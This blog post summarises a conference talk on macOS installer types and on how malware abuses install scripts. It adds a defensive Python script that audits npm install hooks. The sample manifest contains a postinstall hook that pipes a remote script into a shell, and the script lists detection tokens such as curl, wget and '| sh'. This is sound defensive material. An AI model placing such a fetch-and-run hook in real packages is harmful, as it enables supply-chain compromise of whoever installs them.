The Wild World of macOS Installers

A deep dive into the various types of installers used by macOS, including how they work, what they’re capable of doing (and not doing) and understanding why threat actors are increasingly packaging malicious code using these common methods to distribute malware.

October 20 2021 by Jesus Vigo

In the “Wild World of macOS Installers” presentation, the host Tony Lambert waxes poetic about what an installer is and the different ways to install software on a macOS-based device. In Tony’s words, “an installer is going to be anything that drops additional, arbitrary, executable code onto a computer system."

Some of the different installer types used within macOS are:

  • Package (PKG)
  • DMG
  • Developer Libraries
    • Python, Ruby and NodeJS

From a security standpoint, Tony draws a connection between installers and malware: both install apps, both modify configuration settings, and both are used as vessels to deliver code. The major difference between them is that installers typically come from trusted sources, whereas malware doesn't.

No doubt this similarity is one of the driving reasons why threat actors are increasingly stashing malicious code, scripts and so forth within installers to increase the chance of infecting target devices. Within the presentation, Tony dives into the various installer types, highlighting how they work, explaining what tasks can and cannot be performed with them and noting the important processes used in conjunction with each installer type. He explains which are used to launch scripts or to silently install applications in the background, as well as how malware like Silver Sparrow abuses these functions to infect your Mac.

The latter portion of the presentation focuses less on PKG/DMG installers and delves specifically into third-party developer installers, such as those used by popular developer frameworks like Python, Ruby and NodeJS. Tony breaks down each installer's mechanism and the commands used to invoke it. He covers the script methods used to automate installs, as well as the additional features that let admins run preinstall/post-install commands when preparing environments or when follow-up tasks, such as running updates, need to occur after code has been installed.
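As an added illustration (not code from the presentation or from Jamf), the following Python script audits the npm lifecycle hooks that run automatically during `npm install` in a constructed `package.json`, the same preinstall/post-install mechanism the talk describes for developer-library installers. The sample manifest, its URL and the flagging heuristics are assumptions for the demonstration.

```python
import json

# Lifecycle script names that npm runs on its own around "npm install" (these are npm's own hook names).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Constructed sample package.json, not taken from any real package: one ordinary build step
# and one install hook that fetches and executes remote code, the pattern a reviewer should catch.
SAMPLE_PACKAGE_JSON = """
{
  "name": "example-widget",
  "version": "1.0.0",
  "scripts": {
    "build": "tsc -p .",
    "postinstall": "curl -s https://example.invalid/setup.sh | sh",
    "test": "node test.js"
  }
}
"""


def install_hooks(package_json_text):
    """Return {hook_name: command} for every script npm would run during an install."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts", {})
    return {name: scripts[name] for name in INSTALL_HOOKS if name in scripts}


def suspicious_hooks(package_json_text):
    """Flag install hooks that fetch remote content or pipe into a shell.

    Returns a list of (hook_name, reason) tuples; heuristics are intentionally simple.
    """
    findings = []
    for hook, cmd in install_hooks(package_json_text).items():
        reasons = []
        if any(tok in cmd for tok in ("curl ", "wget ", "http://", "https://")):
            reasons.append("downloads remote content")
        if any(tok in cmd for tok in ("| sh", "| bash", "sh -c", "bash -c", "eval ")):
            reasons.append("pipes into a shell")
        if reasons:
            findings.append((hook, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for hook, reason in suspicious_hooks(SAMPLE_PACKAGE_JSON):
        print(f"{hook}: {reason}")
```

Running the same check over a Ruby gemspec's extension list or a Python package's `setup.py` follows the same idea: inspect what executes at install time before trusting the installer.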

Register for JNUC to access this session as well as other sessions on-demand.
